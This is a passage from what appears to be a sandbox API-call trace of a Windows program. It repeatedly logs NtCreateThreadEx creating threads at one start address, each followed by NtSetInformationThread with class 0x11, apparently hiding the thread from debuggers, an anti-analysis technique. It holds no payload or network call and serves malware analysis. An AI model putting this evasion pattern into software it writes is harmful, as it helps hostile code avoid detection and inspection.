out: ThreadHandle=0x39af9e4*=0x418, lpBytesBuffer=0x0) returned 0x0 [0089.942] NtSetInformationThread (ThreadHandle=0x418, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.942] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x41c, lpBytesBuffer=0x0) returned 0x0 [0089.942] NtSetInformationThread (ThreadHandle=0x41c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.943] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x420, lpBytesBuffer=0x0) returned 0x0 [0089.943] NtSetInformationThread (ThreadHandle=0x420, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.943] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x424, lpBytesBuffer=0x0) returned 0x0 [0089.944] NtSetInformationThread (ThreadHandle=0x424, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.944] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x428, lpBytesBuffer=0x0) returned 0x0 [0089.945] NtSetInformationThread (ThreadHandle=0x428, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.945] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x42c, lpBytesBuffer=0x0) returned 0x0 [0089.946] NtSetInformationThread (ThreadHandle=0x42c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.946] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x430, lpBytesBuffer=0x0) returned 0x0 [0089.946] NtSetInformationThread (ThreadHandle=0x430, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.946] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x434, lpBytesBuffer=0x0) returned 0x0 [0089.947] NtSetInformationThread (ThreadHandle=0x434, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.947] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x438, lpBytesBuffer=0x0) returned 0x0 [0089.948] NtSetInformationThread (ThreadHandle=0x438, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.948] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x43c, lpBytesBuffer=0x0) returned 0x0 [0089.948] NtSetInformationThread (ThreadHandle=0x43c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.949] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x440, lpBytesBuffer=0x0) returned 0x0 [0089.949] NtSetInformationThread (ThreadHandle=0x440, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.949] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x444, lpBytesBuffer=0x0) returned 0x0 [0089.950] NtSetInformationThread (ThreadHandle=0x444, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.950] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x448, lpBytesBuffer=0x0) returned 0x0 [0089.951] NtSetInformationThread (ThreadHandle=0x448, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.951] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x44c, lpBytesBuffer=0x0) returned 0x0 [0089.951] NtSetInformationThread (ThreadHandle=0x44c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.952] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x450, lpBytesBuffer=0x0) returned 0x0 [0089.952] NtSetInformationThread (ThreadHandle=0x450, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.952] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x454, lpBytesBuffer=0x0) returned 0x0 [0089.953] NtSetInformationThread (ThreadHandle=0x454, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.953] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x458, lpBytesBuffer=0x0) returned 0x0 [0089.954] NtSetInformationThread (ThreadHandle=0x458, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.954] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x45c, lpBytesBuffer=0x0) returned 0x0 [0089.955] NtSetInformationThread (ThreadHandle=0x45c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.955] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x460, lpBytesBuffer=0x0) returned 0x0 [0089.955] NtSetInformationThread (ThreadHandle=0x460, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.955] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x464, lpBytesBuffer=0x0) returned 0x0 [0089.956] NtSetInformationThread (ThreadHandle=0x464, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.956] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x468, lpBytesBuffer=0x0) returned 0x0 [0089.957] NtSetInformationThread (ThreadHandle=0x468, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.957] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x46c, lpBytesBuffer=0x0) returned 0x0 [0089.958] NtSetInformationThread (ThreadHandle=0x46c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.958] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x470, lpBytesBuffer=0x0) returned 0x0 [0089.958] NtSetInformationThread (ThreadHandle=0x470, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.958] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x474, lpBytesBuffer=0x0) returned 0x0 [0089.959] NtSetInformationThread (ThreadHandle=0x474, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.959] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x478, lpBytesBuffer=0x0) returned 0x0 [0089.960] NtSetInformationThread (ThreadHandle=0x478, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.960] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x47c, lpBytesBuffer=0x0) returned 0x0 [0089.961] NtSetInformationThread (ThreadHandle=0x47c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.961] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x480, lpBytesBuffer=0x0) returned 0x0 [0089.961] NtSetInformationThread (ThreadHandle=0x480, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.962] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x484, lpBytesBuffer=0x0) returned 0x0 [0089.962] NtSetInformationThread (ThreadHandle=0x484, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.962] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x488, lpBytesBuffer=0x0) returned 0x0 [0089.963] NtSetInformationThread (ThreadHandle=0x488, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.963] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x48c, lpBytesBuffer=0x0) returned 0x0 [0089.964] NtSetInformationThread (ThreadHandle=0x48c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.964] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x490, lpBytesBuffer=0x0) returned 0x0 [0089.964] NtSetInformationThread (ThreadHandle=0x490, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.964] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x494, lpBytesBuffer=0x0) returned 0x0 [0089.965] NtSetInformationThread (ThreadHandle=0x494, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.965] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x498, lpBytesBuffer=0x0) returned 0x0 [0089.966] NtSetInformationThread (ThreadHandle=0x498, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.966] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x49c, lpBytesBuffer=0x0) returned 0x0 [0089.967] NtSetInformationThread (ThreadHandle=0x49c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.967] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4a0, lpBytesBuffer=0x0) returned 0x0 [0089.967] NtSetInformationThread (ThreadHandle=0x4a0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.968] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4a4, lpBytesBuffer=0x0) returned 0x0 [0089.968] NtSetInformationThread (ThreadHandle=0x4a4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.968] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4a8, lpBytesBuffer=0x0) returned 0x0 [0089.969] NtSetInformationThread (ThreadHandle=0x4a8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.969] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4ac, lpBytesBuffer=0x0) returned 0x0 [0089.970] NtSetInformationThread (ThreadHandle=0x4ac, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.970] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4b0, lpBytesBuffer=0x0) returned 0x0 [0089.971] NtSetInformationThread (ThreadHandle=0x4b0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0089.971] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x3c0, lpBytesBuffer=0x0) returned 0x0 [0090.704] NtSetInformationThread (ThreadHandle=0x3c0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.704] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4b8, lpBytesBuffer=0x0) returned 0x0 [0090.705] NtSetInformationThread (ThreadHandle=0x4b8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.705] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4bc, lpBytesBuffer=0x0) returned 0x0 [0090.706] NtSetInformationThread (ThreadHandle=0x4bc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.706] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4c0, lpBytesBuffer=0x0) returned 0x0 [0090.706] NtSetInformationThread (ThreadHandle=0x4c0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.706] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4c4, lpBytesBuffer=0x0) returned 0x0 [0090.707] NtSetInformationThread (ThreadHandle=0x4c4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.707] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4c8, lpBytesBuffer=0x0) returned 0x0 [0090.708] NtSetInformationThread (ThreadHandle=0x4c8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.708] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4cc, lpBytesBuffer=0x0) returned 0x0 [0090.708] NtSetInformationThread (ThreadHandle=0x4cc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.708] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4d0, lpBytesBuffer=0x0) returned 0x0 [0090.709] NtSetInformationThread (ThreadHandle=0x4d0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.709] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4d4, lpBytesBuffer=0x0) returned 0x0 [0090.709] NtSetInformationThread (ThreadHandle=0x4d4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.709] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4d8, lpBytesBuffer=0x0) returned 0x0 [0090.710] NtSetInformationThread (ThreadHandle=0x4d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.710] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4dc, lpBytesBuffer=0x0) returned 0x0 [0090.711] NtSetInformationThread (ThreadHandle=0x4dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.711] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4e0, lpBytesBuffer=0x0) returned 0x0 [0090.711] NtSetInformationThread (ThreadHandle=0x4e0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.712] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4e4, lpBytesBuffer=0x0) returned 0x0 [0090.712] NtSetInformationThread (ThreadHandle=0x4e4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 